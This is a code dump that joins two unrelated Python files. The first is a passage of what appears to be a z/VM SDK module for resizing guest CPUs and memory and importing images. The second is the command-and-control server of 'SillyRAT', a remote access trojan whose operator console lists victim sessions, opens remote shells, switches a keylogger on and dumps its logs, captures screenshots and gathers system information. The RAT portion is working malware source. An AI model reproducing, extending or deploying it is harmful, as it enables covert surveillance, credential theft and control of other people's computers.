max_cpus)
# sort the list and get the first few addrs to use
available_addrs.sort()
# Define new cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid,
"--operands"))
updated_addrs = available_addrs[0:count - defined_count]
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Define new cpus in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("New CPUs defined in user directory for '%s' "
"successfully" % userid)
return (action, updated_addrs, max_cpus)
else:
action = 2
# Delete CPUs
defined_addrs.sort()
updated_addrs = defined_addrs[-(defined_count - count):]
# Delete the last few cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid,
"--operands"))
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Delete CPUs in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("CPUs '%s' deleted from user directory for '%s' "
"successfully" % (str(updated_addrs), userid))
return (action, updated_addrs, max_cpus)
def live_resize_cpus(self, userid, count):
# Get active cpu count and compare with requested count
# If request count is smaller than the current count, then report
# error and exit immediately.
active_addrs = self._get_active_cpu_addrs(userid)
active_count = len(active_addrs)
if active_count > count:
LOG.error("Failed to live resize cpus of guest: %(uid)s, "
"current active cpu count: %(cur)i is greater than "
"the requested count: %(req)i." %
{'uid': userid, 'cur': active_count,
'req': count})
raise exception.SDKConflictError(modID='guest', rs=2,
userid=userid,
active=active_count,
req=count)
# Static resize CPUs. (add or delete CPUs from user directory)
(action, updated_addrs, max_cpus) = self.resize_cpus(userid, count)
if active_count == count:
# active count equals to requested
LOG.info("Current active cpu count of guest: '%s' equals to the "
"requested count: '%i', no more actions needed for "
"live resize." % (userid, count))
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
return
else:
# Get the number of cpus to add to active and check address
active_free = self._get_available_cpu_addrs(active_addrs,
max_cpus)
active_free.sort()
active_new = active_free[0:count - active_count]
# Do live resize
# Define new cpus
cmd_str = "vmcp def cpu " + ' '.join(active_new)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Define cpu of guest: '%s' to active failed with . "
"error: %s." % (userid, err1.format_message()))
# Start to do rollback
if action == 0:
LOG.error(msg1)
else:
LOG.error(msg1 + (" Will revert the user directory "
"change."))
# Combine influenced cpu addrs
cpu_entries = ""
for addr in updated_addrs:
cpu_entries += (" -k CPU=CPUADDR=%s" % addr)
rd = ''
if action == 1:
# Delete added CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM"
% userid, " --operands"))
else:
# Add deleted CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Create_DM"
% userid, " --operands"))
rd += cpu_entries
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
msg = ("Failed to revert user directory change for '"
"%s', SMT error: %s" % (userid,
err2.format_message()))
LOG.error(msg)
else:
LOG.info("Revert user directory change for '%s' "
"successfully." % userid)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
# Activate successfully, rescan in Linux layer to hot-plug new cpus
LOG.info("Added new CPUs to active configuration of guest '%s'" %
userid)
try:
self.execute_cmd(userid, "chcpu -r")
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Rescan cpus to hot-plug new defined cpus for guest: "
"'%s' failed with error: %s. No rollback is done and you"
"may need to check the status and restart the guest to "
"make the defined cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=8, userid=userid,
err=msg)
uname_out = self.execute_cmd(userid, "uname -a")
if uname_out and len(uname_out) >= 1:
distro = uname_out[0]
else:
distro = ''
if 'ubuntu' in distro or 'Ubuntu' in distro \
or 'UBUNTU' in distro:
try:
# need use chcpu -e <cpu-list> to make cpu online for Ubuntu
online_cmd = "chcpu -e " + ','.join(active_new)
self.execute_cmd(userid, online_cmd)
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Enable cpus for guest: '%s' failed with error: %s. "
"No rollback is done and you may need to check the "
"status and restart the guest to make the defined "
"cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=15, userid=userid,
err=msg)
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
def _get_defined_memory(self, userid):
user_direct = self.get_user_direct(userid)
defined_mem = max_mem = reserved_mem = -1
for ent in user_direct:
# u'USER userid password storage max privclass'
if ent.startswith("USER "):
fields = ent.split(' ')
if len(fields) != 6:
# This case should not exist if the target user
# is created by zcc and not updated manually by user
break
defined_mem = int(zvmutils.convert_to_mb(fields[3]))
max_mem = int(zvmutils.convert_to_mb(fields[4]))
# For legacy guests, the reserved memory may not be defined
if ent.startswith("COMMAND DEF STOR RESERVED"):
reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4]))
return (defined_mem, max_mem, reserved_mem, user_direct)
def _replace_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
entry_str = ""
if isinstance(user_entry, list):
for ent in user_entry:
if ent == "":
# skip empty line
continue
else:
entry_str += (ent + '\n')
else:
entry_str = user_entry
tmp_folder = tempfile.mkdtemp()
tmp_user_direct = os.path.join(tmp_folder, userid)
with open(tmp_user_direct, 'w') as f:
f.write(entry_str)
rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid,
"--operands ",
"-f %s" % tmp_user_direct))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err1:
msg = ("Replace definition of guest '%s' failed with "
"SMT error: %s." % (userid, err1.format_message()))
LOG.error(msg)
LOG.debug("Unlocking the user directory.")
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
else:
LOG.debug("Guest '%s' unlocked successfully." % userid)
# at the end, raise the replace error for upper layer to handle
raise err1
finally:
self._pathutils.clean_temp_folder(tmp_folder)
def _lock_user_direct(self, userid):
rd = ("SMAPI %s API Image_Lock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
# ignore the "already locked" error
if ((e.results['rc'] == 400) and (e.results['rs'] == 12)):
LOG.debug("Image is already unlocked.")
else:
msg = ("Lock definition of guest '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise e
def resize_memory(self, userid, memory):
# Check defined storage in user entry.
# Update STORAGE and RESERVED accordingly.
size = int(zvmutils.convert_to_mb(memory))
(defined_mem, max_mem, reserved_mem,
user_direct) = self._get_defined_memory(userid)
# Check max memory is properly defined
if max_mem == -1 or reserved_mem == -1:
LOG.error("Memory resize for guest '%s' cann't be done."
"Failed to get the defined/max/reserved memory size "
"from user directory." % userid)
raise exception.SDKConflictError(modID='guest', rs=19,
userid=userid)
action = 0
# Make sure requested size is less than the maximum memory size
if size > max_mem:
LOG.error("Memory resize for guest '%s' cann't be done. The "
"requested memory size: '%im' exceeds the maximum "
"size allowed: '%im'." %
(userid, size, max_mem))
raise exception.SDKConflictError(modID='guest', rs=20,
userid=userid,
req=size, max=max_mem)
# check if already satisfy request
if defined_mem == size:
LOG.info("The current defined memory size in user '%s' equals "
"to requested size: %im, no action for memory resize "
"needed." % (userid, size))
return (action, defined_mem, max_mem, user_direct)
else:
# set action to 1 to represent that revert need to be done when
# live resize failed.
action = 1
# get the new reserved memory size
new_reserved = max_mem - size
# prepare the new user entry content
entry_str = ""
for ent in user_direct:
if ent == '':
# Avoid adding an empty line in the entry file
# otherwise Image_Replace_DM would return syntax error.
continue
new_ent = ""
if ent.startswith("USER "):
fields = ent.split(' ')
for i in range(len(fields)):
# update fields[3] to new defined size
if i != 3:
new_ent += (fields[i] + ' ')
else:
new_ent += (str(size) + 'M ')
# remove the last space
new_ent = new_ent.strip()
elif ent.startswith("COMMAND DEF STOR RESERVED"):
new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved)
else:
new_ent = ent
# append this new entry
entry_str += (new_ent + '\n')
# Lock and replace user definition with the new_entry content
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
LOG.debug("User directory Locked successfully for guest '%s' " %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, entry_str)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
# Finally return useful info
return (action, defined_mem, max_mem, user_direct)
def _revert_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed:
# print revert error and return
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory Locked successfully for guest '%s'." %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, user_entry)
except exception.SDKSMTRequestFailed:
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory reverted successfully for guest '%s'." %
userid)
def _get_active_memory(self, userid):
# Return an integer value representing the active memory size in mb
output = self.execute_cmd(userid, "lsmem")
active_mem = 0
for e in output:
# cmd output contains line starts with "Total online memory",
# its format can be like:
# "Total online memory : 8192 MB"
# or
# "Total online memory: 8G"
# need handle both formats
if e.startswith("Total online memory"):
try:
# sample mem_info_str: "8192MB" or "8G"
mem_info_str = e.split(':')[1].replace(' ', '').upper()
# make mem_info as "8192M" or "8G"
if mem_info_str.endswith('B'):
mem_info = mem_info_str[:-1]
else:
mem_info = mem_info_str
active_mem = int(zvmutils.convert_to_mb(mem_info))
except (IndexError, ValueError, KeyError, TypeError) as e:
errmsg = ("Failed to get active storage size for guest: %s"
% userid)
LOG.error(errmsg + " with error: " + six.text_type(e))
raise exception.SDKInternalError(msg=errmsg)
break
return active_mem
def live_resize_memory(self, userid, memory):
# Get active memory size and compare with requested size
# If request size is smaller than the current size, then report
# error and exit immediately.
size = int(zvmutils.convert_to_mb(memory))
active_size = self._get_active_memory(userid)
if active_size > size:
LOG.error("Failed to live resize memory of guest: %(uid)s, "
"current active memory size: %(cur)im is greater than "
"the requested size: %(req)im." %
{'uid': userid, 'cur': active_size,
'req': size})
raise exception.SDKConflictError(modID='guest', rs=18,
userid=userid,
active=active_size,
req=size)
# Static resize memory. (increase/decrease memory from user directory)
(action, defined_mem, max_mem,
user_direct) = self.resize_memory(userid, memory)
# Compare active size and requested size, then update accordingly
if active_size == size:
# online memory already satisfied
LOG.info("Current active memory size of guest: '%s' equals to the "
"requested size: '%iM', no more actions needed for "
"live resize." % (userid, size))
LOG.info("Live resize memory for guest: '%s' finished "
"successfully." % userid)
return
else:
# Do live resize. update memory size
increase_size = size - active_size
# Step1: Define new standby storage
cmd_str = ("vmcp def storage standby %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as e:
# rollback and return
msg = ("Define standby memory of guest: '%s' failed with "
"error: %s." % (userid, e.format_message()))
LOG.error(msg)
# Start to do rollback
if action == 1:
LOG.debug("Start to revert user definition of guest '%s'."
% userid)
self._revert_user_direct(userid, user_direct)
# Finally, raise the error and exit
raise exception.SDKGuestOperationError(rs=11,
userid=userid,
err=e.format_message())
# Step 2: Online new memory
cmd_str = ("chmem -e %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Online memory of guest: '%s' failed with "
"error: %s." % (userid, err1.format_message()))
LOG.error(msg1)
# Start to do rollback
LOG.info("Start to do revert.")
LOG.debug("Reverting the standby memory.")
try:
self.execute_cmd(userid, "vmcp def storage standby 0M")
except exception.SDKSMTRequestFailed as err2:
# print revert error info and continue
msg2 = ("Revert standby memory of guest: '%s' failed with "
"error: %s." % (userid, err2.format_message()))
LOG.error(msg2)
# Continue to do the user directory change.
if action == 1:
LOG.debug("Reverting the user directory change of guest "
"'%s'." % userid)
self._revert_user_direct(userid, user_direct)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
LOG.info("Live resize memory for guest: '%s' finished successfully."
% userid)
def is_rhcos(self, os_version):
return os_version.lower().startswith('rhcos')
def _get_wwpn_lun(self, userid):
user_direct = self.get_user_direct(userid)
wwpn = None
lun = None
for ent in user_direct:
if ent.upper().startswith("LOADDEV PORT"):
wwpn = ent.split()[2].strip()
elif ent.upper().startswith("LOADDEV LUN"):
lun = ent.split()[2].strip()
return (wwpn, lun)
class FilesystemBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
"""Import image from remote host to local image repository using scp.
If remote_host not specified, it means the source file exist in local
file system, just copy the image to image repository
"""
source = urlparse.urlparse(url).path
if kwargs['remote_host']:
if '@' in kwargs['remote_host']:
source_path = ':'.join([kwargs['remote_host'], source])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Copying image file from remote filesystem failed"
" with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=10, err=output)
else:
msg = ("The specified remote_host %s format invalid" %
kwargs['remote_host'])
LOG.error(msg)
raise exception.SDKImageOperationError(rs=11,
rh=kwargs['remote_host'])
else:
LOG.debug("Remote_host not specified, will copy from local")
try:
shutil.copyfile(source, target)
except Exception as err:
msg = ("Import image from local file system failed"
" with reason %s" % six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=12,
err=six.text_type(err))
@classmethod
def image_export(cls, source_path, dest_url, **kwargs):
"""Export the specific image to remote host or local file system """
dest_path = urlparse.urlparse(dest_url).path
if kwargs['remote_host']:
target_path = ':'.join([kwargs['remote_host'], dest_path])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target_path])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when copying image file to remote "
"host with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=21, msg=output)
else:
# Copy to local file system
LOG.debug("Remote_host not specified, will copy to local server")
try:
shutil.copyfile(source_path, dest_path)
except Exception as err:
msg = ("Export image from %(src)s to local file system"
" %(dest)s failed: %(err)s" %
{'src': source_path,
'dest': dest_path,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=22,
err=six.text_type(err))
class HTTPBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
import_image = MultiThreadDownloader(image_name, url,
target)
import_image.run()
class MultiThreadDownloader(threading.Thread):
def __init__(self, image_name, url, target):
super(MultiThreadDownloader, self).__init__()
self.url = url
# Set thread number
self.threadnum = 8
r = requests.head(self.url)
# Get the size of the download resource
self.totalsize = int(r.headers['Content-Length'])
self.target = target
def handle_download_errors(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as err:
self.fd.close()
msg = ("Download image from http server failed: %s" %
six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=9,
err=six.text_type(err))
return wrapper
def get_range(self):
ranges = []
offset = int(self.totalsize / self.threadnum)
for i in range(self.threadnum):
if i == self.threadnum - 1:
ranges.append((i * offset, ''))
else:
# Get the process range for each thread
ranges.append((i * offset, (i + 1) * offset))
return ranges
def download(self, start, end):
headers = {'Range': 'Bytes=%s-%s' % (start, end),
'Accept-Encoding': '*'}
# Get the data
res = requests.get(self.url, headers=headers)
# seek to the right position for writing data
LOG.debug("Downloading file range %s:%s success" % (start, end))
with _LOCK:
self.fd.seek(start)
self.fd.write(res.content)
@handle_download_errors
def run(self):
self.fd = open(self.target, 'w')
thread_list = []
n = 0
for ran in self.get_range():
start, end = ran
LOG.debug('thread %d start:%s,end:%s' % (n, start, end))
n += 1
# Open thread
thread = threading.Thread(target=self.download, args=(start, end))
thread.start()
thread_list.append(thread)
for i in thread_list:
i.join()
LOG.info('Download %s success' % (self.name))
self.fd.close()
|
server_gbk.py
|
import sys
import os
import socket
import time
import base64
import tabulate
import signal
import subprocess
import argparse
import shutil
import threading
import platform
import PyInstaller.__main__
from datetime import datetime
__LOGO__ = """
____ _ _ _ ____ _ _____
/ ___|(_) | |_ _| _ \\ / \\|_ _|
\\___ \\| | | | | | | |_) | / _ \\ | |
___) | | | | |_| | _ < / ___ \\| |
|____/|_|_|_|\\__, |_| \\_\\/_/ \\_\\_|
|___/
%s v1.0 @hash3liZer/@TheFlash2k
"""
__HELP_OVERALL__ = """usage: python3 sillyray.py command [--help] [--option OPTION]
These are the commands available for usage:
bind Run the Server on machine and establish connections
generate Generate the Payload file for target platform
You can further get help on available commands by supplying
'--help' argument. For example: 'python3 sillyrat generate --help'
will print help manual for generate commmand
"""
__HELP_BIND__ = """usage: python3 sillyrat.py bind [--address ADDRESS] [--port PORT]
Args Description
-h, --help Show Help for Bind command
-a, --address IP Address to Bind to
-p, --port Port Number on which to Bind
The Bind command is used to bind the application on server
for incoming connections and control the clients through
the command interface
"""
__HELP_GENERATE__ = """
usage: python3 sillyrat.py generate [--address ADDRESS] [--port PORT] [--output OUTPUT]
Args Description
-h, --help Show Help Manual for generate command
-a, --address IP Address of server. [Connect to]
-p, --port Port of connecting server
-o, --output Output file to generate
-s, --source Do not generate compiled code.
Gives Python source file.
--persistence Auto start on reboot [Under Development]
The generate command generates the required payload
file to be executed on client side. The establish
connection to server and do commands.
"""
class PULL:
WHITE = '\033[1m\033[0m'
PURPLE = '\033[1m\033[95m'
CYAN = '\033[1m\033[96m'
DARKCYAN = '\033[1m\033[36m'
BLUE = '\033[1m\033[94m'
GREEN = '\033[1m\033[92m'
YELLOW = '\033[1m\033[93m'
RED = '\033[1m\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
LINEUP = '\033[F'
def __init__(self):
if not self.support_colors:
self.win_colors()
def support_colors(self):
plat = sys.platform
supported_platform = plat != 'Pocket PC' and (plat != 'win32' or \
'ANSICON' in os.environ)
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if not supported_platform or not is_a_tty:
return False
return True
def win_colors(self):
self.WHITE = ''
self.PURPLE = ''
self.CYAN = ''
self.DARKCYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.BOLD = ''
self.UNDERLINE = ''
self.END = ''
def get_com(self, mss=()):
if mss:
rtval = input(self.DARKCYAN + "$" + self.END + " [" + self.GREEN + mss[1].ip + self.END + ":" + self.RED + str(mss[1].port) + self.END + "] ")
else:
rtval = input(self.DARKCYAN + "$" + self.END + " ")
rtval = rtval.rstrip(" ").lstrip(" ")
return rtval
def print(self, mess):
print(self.GREEN + "[" + self.UNDERLINE + "*" + self.END + self.GREEN + "] " + self.END + mess + self.END)
def function(self, mess):
print(self.BLUE + "[" + self.UNDERLINE + ":" + self.END + self.BLUE + "] " + self.END + mess + self.END)
def error(self, mess):
print(self.RED + "[" + self.UNDERLINE + "!" + self.END + self.RED + "] " + self.END + mess + self.END)
def exit(self, mess=""):
sys.exit(self.RED + "[" + self.UNDERLINE + "~" + self.END + self.RED + "] " + self.END + mess + self.END)
def logo(self):
print(self.DARKCYAN + __LOGO__ % self.YELLOW + self.END)
def help_c_current(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('shell' , 'Launch a New Terminal/Shell.'),
('keylogger', 'KeyLogger Module'),
('sysinfo', 'Dump System, Processor, CPU and Network Information'),
('screenshot', 'Take Screenshot on Target Machine and Save on Local'),
('exit', 'Exit from SillyRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_general(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('exit', 'Exit from SillyRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sessions(self):
sys.stdout.write("\n")
print("Info : Display connected sessions to the server!")
print("Arguments : None")
print("Example : \n")
print("$ sessions")
sys.stdout.write("\n")
def help_c_connect(self):
sys.stdout.write("\n")
print("Info : Connect to an available session!")
print("Arguments : Session ID")
print("Example : \n")
print("$ connect 56\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Type' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('ID', 'integer', 'ID of the sessions from the list')
]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_disconnect(self):
sys.stdout.write("\n")
print("Info : Disconnect current session!")
print("Arguments : None")
print("Example : \n")
print("$ disconnect")
sys.stdout.write("\n")
def help_c_clear(self):
sys.stdout.write("\n")
print("Info : Clear screen!")
print("Arguments : None")
print("Example : \n")
print("$ clear")
sys.stdout.write("\n")
def help_c_shell(self):
sys.stdout.write("\n")
print("Info : Launch a shell against client!")
print("Arguments : None")
print("Example : \n")
print("$ shell")
sys.stdout.write("\n")
def help_c_keylogger(self):
sys.stdout.write("\n")
print("Info : Keylogger Module!")
print("Arguments : on, off, dump")
print("Example : \n")
print("$ keylogger on")
print("$ keylogger off")
print("$ keylogger dump\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('on', 'Turn Keylogger on'),
('off', 'Turn Keylogger off'),
('dump', 'Dump keylogs')
]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sysinfo(self):
sys.stdout.write("\n")
print("Info : Gathers system information!")
print("Arguments : None")
print("Example : \n")
print("$ sysinfo")
sys.stdout.write("\n")
def help_c_screenshot(self):
sys.stdout.write("\n")
print("Info : Screenshot the current screen and save it on server!")
print("Arguments : None")
print("Example : \n")
print("$ screenshot")
sys.stdout.write("\n")
def help_overall(self):
global __HELP_OVERALL__
print(__HELP_OVERALL__)
sys.exit(0)
def help_bind(self):
global __HELP_BIND__
print(__HELP_BIND__)
sys.exit(0)
def help_generate(self):
global __HELP_GENERATE__
print(__HELP_GENERATE__)
sys.exit(0)
pull = PULL()
class CLIENT:
STATUS = "Active"
MESSAGE = ""
KEY = ")J@NcRfU"
def __init__(self, sock, addr):
self.sock = sock
self.ip = addr[0]
self.port = addr[1]
def acceptor(self):
data = ""
chunk = ""
while True:
chunk = self.sock.recv(4096)
print(len(chunk))
if not chunk:
self.STATUS = "Disconnected"
break
data += chunk.decode('gbk')
if self.KEY.encode('gbk') in chunk:
try:
self.MESSAGE = base64.decodebytes(data.rstrip(self.KEY).encode('gbk')).decode('gbk')
except UnicodeDecodeError:
self.MESSAGE = base64.decodebytes(data.rstrip(self.KEY).encode('gbk'))
if not self.MESSAGE:
self.MESSAGE = " "
data = ""
def engage(self):
t = threading.Thread(target=self.acceptor)
t.daemon = True
t.start()
def send_data(self, val):
bef = base64.encodebytes(val.encode('utf-8')) + self.KEY.encode('utf-8')
new = ''
for i in bef:
new+=chr(i^76)
print(i^76)
new = new.encode()
print("_________________")
for i in new:
print(i)
self.sock.send(bef)
def recv_data(self):
while not self.MESSAGE:
try:
pass
except KeyboardInterrupt:
break
rtval = self.MESSAGE
self.MESSAGE = ""
return rtval
class COMMCENTER:
CLIENTS = []
COUNTER = 0
CURRENT = () #### Current Target Client ####
KEYLOGS = []
def c_help(self, vals):
if len(vals) > 1:
if vals[1] == "sessions":
pull.help_c_sessions()
elif vals[1] == "connect":
pull.help_c_connect()
elif vals[1] == "disconnect":
pull.help_c_disconnect()
elif vals[1] == "clear":
pull.help_c_clear()
elif vals[1] == "shell":
pull.help_c_shell()
elif vals[1] == "keylogger":
pull.help_c_keylogger()
elif vals[1] == "sysinfo":
pull.help_c_sysinfo()
elif vals[1] == "screenshot":
pull.help_c_screenshot()
else:
if self.CURRENT:
pull.help_c_current()
else:
pull.help_c_general()
def get_valid(self, _id):
for client in self.CLIENTS:
if client[0] == int(_id):
return client
return False
def c_ping(self, _id):
return
def c_connect(self, args):
if len(args) == 2:
tgt = self.get_valid(args[1])
if tgt:
self.CURRENT = tgt
else:
sys.stdout.write("\n")
pull.error("No client is associated with that ID!")
sys.stdout.write("\n")
else:
sys.stdout.write("\n")
pull.error("Invalid Syntax!")
sys.stdout.write("\n")
def c_disconnect(self):
self.CURRENT = ()
def c_sessions(self):
headers = (pull.BOLD + 'ID' + pull.END, pull.BOLD + 'IP Address' + pull.END, pull.BOLD + 'Incoming Port' + pull.END, pull.BOLD + 'Status' + pull.END)
lister = []
for client in self.CLIENTS:
toappend = []
toappend.append(pull.RED + str(client[0]) + pull.END)
toappend.append(pull.DARKCYAN + client[1].ip + pull.END)
toappend.append(pull.BLUE + str(client[1].port) + pull.END)
toappend.append(pull.GREEN + client[1].STATUS + pull.END)
lister.append(toappend)
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def c_shell(self):
result = ""
if self.CURRENT:
sys.stdout.write("\n")
while True:
val = input("# ")
val = "shell:" + val.rstrip(" ").lstrip(" ")
if val:
if val != "shell:exit":
self.CURRENT[1].send_data(val)
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
break
else:
sys.stdout.write("\n")
pull.error("You need to connect before execute this command!")
sys.stdout.write("\n")
def c_clear(self):
subprocess.call(["clear"], shell=True)
def c_keylogger(self, args):
if self.CURRENT:
if len(args) == 2:
if args[1] == "status":
return
elif args[1] == "on":
self.CURRENT[1].send_data("keylogger:on")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "off":
self.CURRENT[1].send_data("keylogger:off")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "dump":
self.CURRENT[1].send_data("keylogger:dump")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'keylogs' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.txt") )
fl = open( fullpath, 'w' )
fl.write( result )
fl.close()
pull.print("Dumped: [" + pull.GREEN + fullpath + pull.END + "]")
else:
pull.error("Invalid Syntax!")
else:
pull.error("Invalid Syntax!")
else:
pull.error("You need to connect before execute this command!")
def c_sysinfo(self):
if self.CURRENT:
self.CURRENT[1].send_data("sysinfo:")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
pull.error("You need to connect before execute this command!")
def c_screenshot(self):
if self.CURRENT:
self.CURRENT[1].send_data("screenshot:")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'screenshots' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.png") )
fl = open( fullpath, 'wb' )
fl.write( result )
fl.close()
pull.print("Saved: [" + pull.DARKCYAN + fullpath + pull.END + "]")
else:
pull.error("You need to connect before execute this command!")
def c_exit(self):
sys.stdout.write("\n")
pull.exit("See Ya!\n")
class INTERFACE(COMMCENTER):
SOCKET = None
RUNNER = True
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
def bind(self):
self.SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.SOCKET.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.SOCKET.bind((self.address, self.port))
pull.print("Successfuly Bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
except Exception as e:
print(e)
pull.exit("Unable to bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
def accept_threads(self):
self.SOCKET.listen(10)
while self.RUNNER:
conn, addr = self.SOCKET.accept()
is_valid = True
self.COUNTER += 1
client = CLIENT(conn, addr)
client.engage()
self.CLIENTS.append(
(
self.COUNTER,
client
)
)
def accept(self):
t = threading.Thread(target=self.accept_threads)
t.daemon = True
t.start()
#### Commands ####
def execute(self, vals):
if vals:
if vals[0] == "exit":
self.c_exit()
elif vals[0] == "help":
self.c_help(vals)
elif vals[0] == "sessions":
self.c_sessions()
elif vals[0] == "ping":
self.c_ping(vals)
elif vals[0] == "connect":
self.c_connect(vals)
elif vals[0] == "disconnect":
self.c_disconnect()
elif vals[0] == "shell":
self.c_shell()
elif vals[0] == "clear":
self.c_clear()
elif vals[0] == "keylogger":
self.c_keylogger(vals)
elif vals[0] == "sysinfo":
self.c_sysinfo()
elif vals[0] == "screenshot":
self.c_screenshot()
def launch(self):
pull.print("Launching Interface! Enter 'help' to get avaible commands! \n")
while True:
val = pull.get_com(self.CURRENT)
